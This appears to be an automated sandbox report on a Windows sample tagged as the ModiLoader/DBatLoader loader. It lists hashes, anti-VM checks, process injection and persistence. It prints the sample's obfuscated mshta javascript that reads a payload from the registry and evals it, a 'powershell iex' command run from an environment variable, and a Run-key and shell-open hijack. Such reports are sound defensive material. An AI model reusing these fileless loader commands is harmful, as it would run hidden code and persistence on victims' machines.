Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
08-05-2024 10:11
Static task
static1
Behavioral task
behavioral1
Sample
245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe
Resource
win10v2004-20240419-en
General
-
Target
245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe
-
Size
395KB
-
MD5
245c4c4e6e1cc032d3c504264867202c
-
SHA1
f293f9d6a9102ab1e75418a44adb76f7fabb5758
-
SHA256
84d4030515b6cef25d201b53a1f8df11635ca087b2f0ebd92a7cebbc9d5b4fe4
-
SHA512
160130da3e49dc1bf95a3d509db5730602989043b907adfa5d4a2aec9e4bd48fd440e08ddb17874da52c663bdc12902a78a7fb437610f568179398572fe74a9f
-
SSDEEP
6144:fweZD43kpFW+51Bhxc0ASZls2QTmUcukV2VDtYIHH89GyDfu07/nlgz:f54+5HxFl4Eug2ltrQDvxU
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions regsvr32.exe -
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys regsvr32.exe -
ModiLoader Second Stage 57 IoCs
Processes:
resource yara_rule behavioral1/memory/1680-7-0x0000000000400000-0x000000000046AC40-memory.dmp modiloader_stage2 behavioral1/memory/1680-6-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/1680-5-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/1680-8-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/1680-9-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/1680-4-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/1680-3-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/1680-2-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/1680-1-0x0000000000400000-0x000000000046AC40-memory.dmp modiloader_stage2 behavioral1/memory/2208-14-0x0000000006100000-0x00000000061DC000-memory.dmp modiloader_stage2 behavioral1/memory/2468-15-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-18-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2208-17-0x0000000006100000-0x00000000061DC000-memory.dmp modiloader_stage2 behavioral1/memory/2468-19-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-21-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-34-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-39-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-43-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-46-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-47-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-45-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-44-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-42-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-41-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-38-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-37-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/1680-48-0x0000000001EC0000-0x0000000001F9C000-memory.dmp modiloader_stage2 behavioral1/memory/2468-36-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-35-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-33-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-32-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-40-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-31-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-29-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-28-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-27-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-26-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-25-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-58-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-24-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-23-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-22-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-20-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/2468-30-0x00000000002A0000-0x00000000003EA000-memory.dmp modiloader_stage2 behavioral1/memory/288-59-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-62-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-68-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-66-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-71-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-69-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-67-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-65-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-63-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-61-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-60-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-70-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 behavioral1/memory/288-64-0x0000000000260000-0x00000000003AA000-memory.dmp modiloader_stage2 -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools regsvr32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion regsvr32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion regsvr32.exe -
Deletes itself 1 IoCs
Processes:
regsvr32.exepid process 2468 regsvr32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
regsvr32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d38b1\\f5332.bat\"" regsvr32.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
regsvr32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum regsvr32.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 regsvr32.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.exeregsvr32.exedescription pid process target process PID 2208 set thread context of 2468 2208 powershell.exe regsvr32.exe PID 2468 set thread context of 288 2468 regsvr32.exe regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe -
Modifies registry class 7 IoCs
Processes:
regsvr32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:at6qAM9=\"LHurN\";H8d4=new ActiveXObject(\"WScript.Shell\");j86PLxmJG=\"Exs\";O0ibz0=H8d4.RegRead(\"HKCU\\\\software\\\\atqjps\\\\xawh\");uTkp6U=\"74u2k5\";eval(O0ibz0);l4zW6f=\"7qR\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.108f08 regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\.108f08\ = "085b6" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\085b6 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeregsvr32.exepid process 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe 2208 powershell.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe 2468 regsvr32.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exeregsvr32.exepid process 2208 powershell.exe 2468 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2208 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
mshta.exepowershell.exeregsvr32.exedescription pid process target process PID 2216 wrote to memory of 2208 2216 mshta.exe powershell.exe PID 2216 wrote to memory of 2208 2216 mshta.exe powershell.exe PID 2216 wrote to memory of 2208 2216 mshta.exe powershell.exe PID 2216 wrote to memory of 2208 2216 mshta.exe powershell.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2208 wrote to memory of 2468 2208 powershell.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe PID 2468 wrote to memory of 288 2468 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\245c4c4e6e1cc032d3c504264867202c_JaffaCakes118.exe"1⤵PID:1680
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:o8ZTHbxQ="FBuZ";u1x0=new%20ActiveXObject("WScript.Shell");S9nFn2AhO="t";Cf91rv=u1x0.RegRead("HKCU\\software\\TNNUodRp\\1OQGzOh");gOYuU0d8="54PZj";eval(Cf91rv);Zu3Ujv4hu="q";1⤵
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:nkojm2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵PID:288
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
47KB
MD58e8785fc99e521b344980239cea7f715
SHA1544fd1ceb0e8afc36f554309d4c955be2761474d
SHA2563c8bab5bab1a851987c7cef6e1c6e8825038eb9cbea2bb34999ed90688ca3fcb
SHA5120b344f2b4fa10e8f6683ccf276d566114cc54cda510d9dee9b78909d62fbdb01b07be7fdd7cb1a0593db4ae67ed7984c353030a4b805cd500fb26f49f4f18dfc
-
Filesize
66B
MD5c24de97a6ef661a334132f0ca498cbe9
SHA10defdce90991f705ca974d991ad9617482a72129
SHA25644c74f10aa1e1531544f8d21e6e408af591a42efbb8f31afe922894423a9bee9
SHA512aa3afa1dbe1e7553a766dd8e1cfa95d71905e28b59ee99693bba803f1d6346fb019c9dca410ed361ff228cf9b96848bc5a93b70e486260a0b3dc2ef140fa6b0c